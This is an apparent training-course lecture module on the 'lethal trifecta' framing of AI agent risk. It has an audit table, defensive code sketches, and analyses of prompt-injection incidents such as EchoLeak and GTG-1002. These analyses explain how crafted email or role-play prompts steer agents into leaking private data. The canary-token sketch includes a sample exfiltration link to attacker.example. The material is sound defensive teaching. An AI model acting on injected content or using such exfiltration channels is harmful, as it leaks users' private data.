Module 3.6 — The Lethal Trifecta

50-minute lecture · Day 3 afternoon · Closes Day 3, lab follows

Learning objectives

By the end of this module, students can:

State the three legs of Simon Willison’s “lethal trifecta” — access to private data, exposure to untrusted content, ability to externally communicate
Audit any LLM-touching system against the trifecta, identifying which legs it satisfies
Apply at least three architectural patterns that break a leg of the trifecta, eliminating the class of vulnerability rather than just patching specific instances
Use the trifecta lens to interpret recent incidents (EchoLeak, GTG-1002, the broader EchoLeak class) as instances of the same root cause

The framing

Simon Willison published “The lethal trifecta for AI agents: private data, untrusted content, and external communication” on June 16, 2025. The framing identifies a structural vulnerability pattern in AI agent design:

If your agent combines these three features — access to private data, exposure to untrusted content, and the ability to externally communicate — an attacker can easily trick it into accessing your private data and sending it to that attacker.

The three legs:

Access to private data: your emails, internal documents, databases, customer records, anything the LLM can read on your behalf. Providing this access is one of the most common purposes of tools in the first place, and it is why people deploy enterprise copilots.
Exposure to untrusted content: any mechanism by which text (or images, video, audio) controlled by an attacker could become available to your LLM. Examples include a web page, an incoming email, a third-party document, a public Slack channel, or a customer support ticket.
Ability to externally communicate: any path for the LLM to send data outward. Examples include direct API calls, sending emails, rendering Markdown links or images (the EchoLeak exfil path), posting to message queues, and updating a public dashboard.

The lethal property: when an agent simultaneously has all three, an attacker placing crafted content in the “untrusted content” surface can trick the agent into reading “private data” and sending it through the “external communication” channel — without the user ever knowing.

Source (canonical): simonwillison.net/2025/Jun/16/the-lethal-trifecta/

Why this framing matters

Detection engineering is often a long list of specific patterns: catch this jailbreak string, block this CVE, alert on that signature. The trifecta is architectural — it lets you reason about a class of vulnerabilities and design systems that don’t satisfy all three legs simultaneously.

The trifecta lens explains, in one frame:

EchoLeak (CVE-2025-32711): M365 Copilot had all three legs. Private data (the user’s emails, OneDrive, SharePoint). Untrusted content (incoming email). External communication (Markdown image rendering through a Teams proxy). The crafted email exploited all three at once.
GTG-1002 (Anthropic, Nov 2025): the Claude Code agent had all three. Private data (the target orgs’ internal systems). Untrusted content (the attacker’s role-play prompts disguised as a legitimate penetration test). External communication (the agent’s outbound API calls and tool actions). The attacker arranged the situation so all three were active.
Bargury’s “Living off Microsoft Copilot”: every demonstrated attack technique fits the trifecta. CopilotHunter found “exposed bots”, that is, bots configured to satisfy all three legs simultaneously.

The detection engineer’s value-add: instead of patching one vulnerability after another, audit your LLM-touching systems against the trifecta and decompose the ones that satisfy all three legs.

The trifecta audit pattern

For every LLM-touching system in your org, walk through the three legs:

System	Private data access?	Untrusted content exposure?	External communication?	All three?
M365 Copilot	✓ Outlook, OneDrive, SharePoint	✓ Inbound email content	✓ Markdown links/images via Teams proxy	YES — fix needed
Internal RAG chatbot (knowledge base only)	✓ Internal KB	? Depends on KB content provenance	? Depends on action capabilities	Maybe
Customer-facing support bot	✓ Customer-specific data via session	✓ Customer inputs	✓ Returns responses to customer	YES — fix needed
GitHub Copilot in dev IDE	✓ Local code	✓ Files opened in IDE	✗ No external comms beyond Microsoft API	NO — only two legs
Slack AI summarizing channel	✓ Channel history	✓ Any external user’s message	✓ Posts summary back to channel	YES — fix needed
Image-generation tool	✗ No private data	✓ User prompt	✓ Generates image	NO — only two legs
Slackbot that auto-replies to mentions	✓ Workspace content	✓ Mentioner’s message	✓ Replies in channel	YES — fix needed

A system flagged with three checkmarks is a trifecta-positive system. Trifecta-positive systems are the priority list for the SOC’s defensive architecture review.
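
The audit table can be kept as data rather than as a slide, which makes it easy to re-run as systems change. The following is a minimal Python sketch, not a tool from the source: the `SystemAudit` record, its field names, and the `YES`/`MAYBE`/`NO` status strings are all illustrative assumptions. Each leg is `True`, `False`, or `None`, where `None` stands for the "?" cells that have not been determined yet.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class SystemAudit:
    """One row of the audit table. None means the leg is still undetermined."""
    name: str
    private_data: Optional[bool]
    untrusted_content: Optional[bool]
    external_comms: Optional[bool]

    def status(self) -> str:
        legs = (self.private_data, self.untrusted_content, self.external_comms)
        if any(leg is False for leg in legs):
            return "NO"      # at least one leg is confirmed absent
        if all(leg is True for leg in legs):
            return "YES"     # trifecta-positive
        return "MAYBE"       # no leg ruled out, at least one still unknown


def review_queue(audits: list[SystemAudit]) -> list[str]:
    """Systems needing review: confirmed positives first, then undetermined."""
    order = {"YES": 0, "MAYBE": 1}
    flagged = [a for a in audits if a.status() in order]
    return [a.name for a in sorted(flagged, key=lambda a: order[a.status()])]


# Rows copied from the table above (hypothetical encoding of its cells).
audits = [
    SystemAudit("Internal RAG chatbot", True, None, None),
    SystemAudit("GitHub Copilot in dev IDE", True, True, False),
    SystemAudit("M365 Copilot", True, True, True),
    SystemAudit("Image-generation tool", False, True, True),
]
print(review_queue(audits))  # ['M365 Copilot', 'Internal RAG chatbot']
```

Treating an unknown leg as "not ruled out" is a deliberate choice in this sketch: a system drops off the review queue only when someone has confirmed that a leg is absent.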

The exercise to run with students: have them map the trifecta against their own org’s LLM-touching systems. Most teams discover 3-5 trifecta-positive systems they hadn’t recognized as a coherent risk class.

Architectural patterns that break a leg

When a system is trifecta-positive, the goal is to break at least one leg so the class of vulnerability is eliminated. Three viable patterns:

Pattern 1: Break the External Communication leg

The most common viable decomposition. Run the agent in a sandboxed, network-isolated environment where all outbound traffic is disabled or strictly whitelisted to non-attacker-controllable destinations.

Examples:

Quarantined inference: Run the LLM on an air-gapped node; results delivered to user via a separate review step
Whitelist outbound: The agent can only call specific approved APIs (your internal CRM, your internal ticketing) — not arbitrary URLs, not arbitrary domains
No image rendering in outputs: Disable Markdown image rendering in copilot responses — eliminates one major exfiltration vector (the EchoLeak path)
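
Two of the examples above, allowlisted outbound calls and disabled image rendering, can be sketched in a few lines of Python. This is an illustration under stated assumptions, not a production control: the hostnames in `ALLOWED_HOSTS` are made up, the function names are hypothetical, and the regular expressions are simplified patterns rather than a full Markdown parser (they do not handle HTML `<img>` tags or URLs containing parentheses).

```python
import re
from urllib.parse import urlsplit

# Hypothetical allowlist; replace with your own approved internal hosts.
ALLOWED_HOSTS = frozenset({"crm.internal.example", "tickets.internal.example"})

# Simplified patterns, not a full Markdown parser.
INLINE_IMAGE = re.compile(r"!\[[^\]]*\]\([^)]*\)")   # ![alt](url)
REF_IMAGE = re.compile(r"!\[[^\]]*\]\[[^\]]*\]")     # ![alt][ref]
REF_DEFINITION = re.compile(r"^ {0,3}\[[^\]]+\]:[ \t]*\S.*$", re.MULTILINE)  # [ref]: url


def is_allowed_destination(url: str) -> bool:
    """Allow only https URLs whose exact hostname is on the allowlist."""
    try:
        parts = urlsplit(url)
        host = parts.hostname
    except ValueError:
        return False  # malformed URL: fail closed
    return parts.scheme == "https" and host in ALLOWED_HOSTS


def strip_markdown_images(text: str) -> str:
    """Remove inline and reference-style images before the output is rendered."""
    text = INLINE_IMAGE.sub("[image removed]", text)
    text = REF_IMAGE.sub("[image removed]", text)
    # Dropping reference definitions also disables reference-style links,
    # which is intentional in this sketch.
    return REF_DEFINITION.sub("", text)
```

The hostname check is an exact match on the parsed host rather than a substring or prefix test, so lookalikes such as `crm.internal.example.evil.test` or `crm.internal.example@evil.test` are rejected.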

Pattern 2: Break the Untrusted Content leg

Ensure the agent only sees content that has been verified-trusted before reaching the LLM’s context. Concretely:

Provenance tagging: Every chunk of content the LLM ingests is tagged with its source. Untrusted sources (external emails, third-party APIs, public-web scrapes) are stripped of instruction-shaped content before reaching the LLM.
Pre-LLM injection screening: The Codex-generated detector from Module 3.4 + Llama Guard 3 / Prompt Guard 2 from Module 3.5 — content that fails screening doesn’t reach the LLM.
Isolated context windows: Different content sources go through separate LLM calls. The LLM that processes external email never has direct context to private data.
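
Provenance tagging and isolated context windows can be combined: tag each chunk at ingestion, then route chunks into separate LLM calls based on the tag. The sketch below assumes a hypothetical `Chunk` record and made-up source labels in `TRUSTED_SOURCES`; it only builds the two prompt strings and does not call any model.

```python
from dataclasses import dataclass

# Hypothetical source labels; anything not listed is treated as untrusted.
TRUSTED_SOURCES = frozenset({"internal_kb", "hr_policy"})


@dataclass(frozen=True)
class Chunk:
    source: str  # provenance tag attached at ingestion time
    text: str

    @property
    def trusted(self) -> bool:
        return self.source in TRUSTED_SOURCES


def build_contexts(chunks: list[Chunk], private_data: str) -> dict[str, str]:
    """Build two separate prompts so untrusted text never shares a context
    window with private data."""
    trusted = [c for c in chunks if c.trusted]
    untrusted = [c for c in chunks if not c.trusted]
    privileged = "\n".join(
        [private_data] + [f"[{c.source}] {c.text}" for c in trusted]
    )
    quarantined = "\n".join(f"[{c.source}] {c.text}" for c in untrusted)
    return {"privileged": privileged, "quarantined": quarantined}
```

Unknown sources default to untrusted, so a new ingestion path fails closed until someone adds it to the trusted set. The output of the quarantined call is still attacker-influenced and should itself be handled as untrusted if it is later passed to a privileged step.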

Pattern 3: Break the Private Data Access leg

Reduce the agent’s read scope to the absolute minimum. The agent can’t exfiltrate what it can’t access.

Just-in-time data access: The agent has no standing permission to read your inbox. When the user explicitly asks for an email summary, a separate fetcher retrieves only the needed emails, processes them in a constrained context, returns a summary. The agent never holds broad read permission.
Tenant isolation enforcement: Multi-tenant RAG systems must enforce that retrieval only returns content the requesting tenant owns. The LLM never sees cross-tenant data.
Sensitivity-tiered context: High-sensitivity data is loaded into the LLM only when needed for a specific user-authorized action, and only for the duration of that action.
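
Just-in-time access can be sketched as a short-lived grant that names the exact records a request may read. Everything here is a hypothetical illustration: the `Grant` record, the `issue_grant` and `fetch` helpers, the 60-second default, and the in-memory `store` dictionary standing in for a real mailbox or database. The current time is passed in explicitly so the expiry logic is easy to test.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Grant:
    user: str
    resource_ids: frozenset  # the only records this grant may read
    expires_at: float        # epoch seconds


def issue_grant(user: str, resource_ids: set, now: float,
                ttl_seconds: float = 60.0) -> Grant:
    """Create a grant scoped to specific records for a short window."""
    return Grant(user, frozenset(resource_ids), now + ttl_seconds)


def fetch(grant: Grant, resource_id: str, store: dict, now: float) -> str:
    """Return a record only if the grant is still valid and covers it."""
    if now >= grant.expires_at:
        raise PermissionError("grant expired")
    if resource_id not in grant.resource_ids:
        raise PermissionError(f"{resource_id} is outside the grant")
    return store[resource_id]


# Usage: the user asked for a summary of one email, so only that id is granted.
store = {"msg-1": "Quarterly numbers attached", "msg-2": "Payroll details"}
grant = issue_grant("alice", {"msg-1"}, now=1000.0)
print(fetch(grant, "msg-1", store, now=1010.0))  # Quarterly numbers attached
```

With this shape, an injected instruction to "read the rest of the inbox" fails at the fetcher, because the agent never holds a permission broader than the user's explicit request.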

Meta’s framing: the “Agents Rule of Two”

A defensive heuristic increasingly cited in 2025-2026 enterprise-AI guidance: any AI agent should satisfy at most two legs of the trifecta. If an agent reads private data and processes untrusted content, it should not externally communicate. If an agent reads private data and externally communicates, it should not see untrusted content. If an agent processes untrusted content and externally communicates, it should not read private data.

Instructor note: the “Rule of Two” formulation is increasingly common but verify the specific attribution and source-document before citing in delivery. The principle is widely held; the exact phrasing varies by vendor.

Recent incidents through the trifecta lens

EchoLeak (CVE-2025-32711, M365 Copilot)

✓ Private data: user’s Outlook + OneDrive + SharePoint
✓ Untrusted content: inbound email
✓ External communication: Markdown image rendering through Teams proxy

The fix Microsoft shipped (June 2025) disrupted the Markdown-image-rendering exfiltration path, which broke the External Communication leg for that one channel only. The system is no longer exploitable through that specific attack path, but it remains trifecta-positive with respect to any exfiltration channel that has not yet been discovered. That is why the EchoLeak class is more important than the specific CVE.

GTG-1002 (Anthropic Nov 2025, Claude Code agent)

✓ Private data: target organizations’ internal systems
✓ Untrusted content: attacker’s role-play prompts framing the engagement as “authorized pen test”
✓ External communication: the agent’s outbound API calls and tool invocations

Anthropic’s response was to detect and disrupt specific operator accounts, not to architecturally decompose Claude Code. The vulnerability class remains — the next adversary will use different operator credentials and different role-play framing. The trifecta is unbroken.

CopilotHunter exposing thousands of bots (Bargury BHUSA 2024)

Bargury’s research found enterprise Copilot deployments exposed externally: bots with private-data access and external communication capability that anyone could send untrusted content to. Each exposed bot was a trifecta-positive system. The “fix”, restricting external access, removed the general internet as a source of untrusted content and narrowed that leg to specific authenticated users. It reduces the attacker population rather than eliminating the Untrusted Content leg.

The detection engineer’s role

For trifecta-positive systems that cannot be architecturally decomposed (because the business value depends on the agent having all three properties), the SOC’s role is to:

Layer detection across all three legs:
- Pre-LLM screening for untrusted content (Module 3.4 detector + Module 3.5 guardrails)
- Monitoring on private-data access patterns — alert on unusual scope, volume, or content categories
- Egress monitoring on external communication — detect data-shaped outputs, unusual destinations
Build canary tokens — high-entropy strings in the private-data store that should never appear in outputs. Any appearance = breach evidence.
Output-side data classification — every LLM response is scanned for sensitive content markers before delivery; sensitive content in unexpected contexts triggers HITL
Provenance tracking — every byte of content that influenced an LLM output is tagged with its source. After-the-fact investigation can trace exfiltration paths.
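
The canary-token control in the list above is simple enough to sketch directly. This is a minimal illustration, assuming a hypothetical `cnry-` prefix and helper names; it does exact substring matching only, so an attacker who encodes or splits the token before exfiltration would evade it.

```python
import secrets

CANARY_PREFIX = "cnry-"  # hypothetical marker to make tokens easy to grep for


def make_canary() -> str:
    """Generate a high-entropy token to plant in the private-data store."""
    return CANARY_PREFIX + secrets.token_hex(16)  # 32 hex characters


def find_canaries(output: str, canaries: set) -> set:
    """Return every planted canary that appears verbatim in an LLM output."""
    return {c for c in canaries if c in output}


# Usage: plant the token in a decoy record, then scan each response before delivery.
planted = {make_canary()}
token = next(iter(planted))
leaky_output = f"![status](https://attacker.example/p?d={token})"
if find_canaries(leaky_output, planted):
    print("canary seen in output: treat as breach evidence")
```

Because the token should never appear in any legitimate response, a single hit needs no threshold tuning; it can go straight to an alert.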

These controls don’t break a trifecta leg — they make exploitation noisy enough to detect. Detection is the fallback when architectural decomposition isn’t viable.

Discussion questions (~10 min)

Run the trifecta audit against your org’s existing LLM-touching systems. Which systems are trifecta-positive? For each, which leg is most economically viable to break? Which would require business approval to decompose?
EchoLeak was fixed by breaking the Markdown-image-rendering exfiltration path. Is that the same as breaking the External Communication leg? What other communication channels remain? Is the M365 Copilot deployment still trifecta-positive?
The “Rule of Two” heuristic says any AI agent should satisfy at most two legs. Your CISO objects: “but agents that can read data, act on the world, and process external input are the whole point; that’s the use case.” How do you frame the trade-off?

Common mistakes

Mistake	Better approach
Patching specific vulnerabilities without addressing the architecture	The trifecta lens explains why specific patches don’t generalize — class-of-vulnerability thinking
Auditing only the “top-tier” LLM deployments	Slack AI, internal Teams plugins, low-code agent builders often trip the trifecta without being on the SOC’s radar
Assuming “internal only” means trusted content	Internal content sources can still ingest untrusted content (user-submitted tickets, document uploads, third-party API responses)
Treating External Communication as “obviously needed”	Many LLM use cases don’t actually require external communication; assess before assuming
Stopping at one architectural fix	If the system is trifecta-positive, address all three legs across detection + architecture

Closing Day 3

Day 3 has covered:

LLM-authorship signals (3.1) — YARA rules for over-explanatory comments, AI-idiom naming, defensive over-handling
Polymorphic / runtime-generated malware (3.2) — PromptLock (NYU Tandon PoC) and BlackMamba lineage, network-detection patterns for outbound LLM API calls
OWASP LLM Top 10 (2025) (3.3) — 10 entries each mapped to a detection-engineering deliverable
EchoLeak / enterprise-copilot prompt injection (3.4) — CVE-2025-32711 deep dive, Codex-generated prompt-injection detector, seven-layer defense
Guardrails as SIEM telemetry (3.5) — Llama Guard 3, Prompt Guard 2, NeMo, Azure Prompt Shields wired as event sources, Codex integration sketch
The lethal trifecta (3.6) — Simon Willison’s framing, trifecta audit, three architectural patterns for breaking a leg

The architectural insight running through Day 3: the enterprise’s LLM-touching systems are themselves an attack surface. The trust boundary is no longer at the network perimeter — it’s inside the application, where untrusted content gets processed by privileged LLMs. The detection engineer’s controls must operate at that boundary.

Day 4 takes this further into agentic adversaries — the GTG-1002 class of attack — and AI supply-chain compromise. Day 5 is the capstone where students defend Verdancy Health against a multi-stage AI-orchestrated attack that includes EchoLeak-class prompt injection in Stage 3.